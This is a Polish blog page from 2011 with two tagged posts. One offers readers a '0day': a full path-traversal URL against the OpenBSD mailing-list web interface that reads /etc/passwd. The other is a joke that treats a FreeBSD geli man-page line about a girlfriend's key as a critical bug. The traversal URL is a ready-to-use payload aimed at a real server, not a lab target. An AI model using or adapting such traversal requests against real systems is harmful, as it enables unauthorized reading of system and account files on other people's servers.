Pokazywanie postów oznaczonych etykietą #critical. Pokaż wszystkie posty
Pokazywanie postów oznaczonych etykietą #critical. Pokaż wszystkie posty

piątek, 11 marca 2011

OpenBSD - wyciek danych.

A oto i 0day, specjalnie dla naszych czytelników:

http://lists.openbsd.org/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=./..././..././..././..././..././..././..././.../etc/passwd

Wyciek danych z serwerów OpenBSD. Jak widać na załączonym obrazku błąd w aplikacji na serwerze OpenBSD umożliwia pobranie danych o użytkownikach, np. o niejakim Charlie Root. Dane zawierają ścieżkę do domu i inne ważne informacje.

czwartek, 10 marca 2011

Poważny bug w FreeBSD - critical

8 marca br, odkryto poważny błąd na stronach man(1) dokumentacji FreeBSD a dokładnie geli(8),

Severity: serious.
There is a phrase in geli man pages that
I would classify as sexist:

"Create an encrypted provider, but use two keys:
one for your girlfriend and one for you
(so there will be no tragedy if she forgets her
passphrase):"

Błąd ten został szybko naprawiony. Informujemy o tym dopiero po załataniu luki aby każdy użytkownik FreeBSD płci męskiej mógł czuć się w domu bezpiecznie.
src: FreeBSD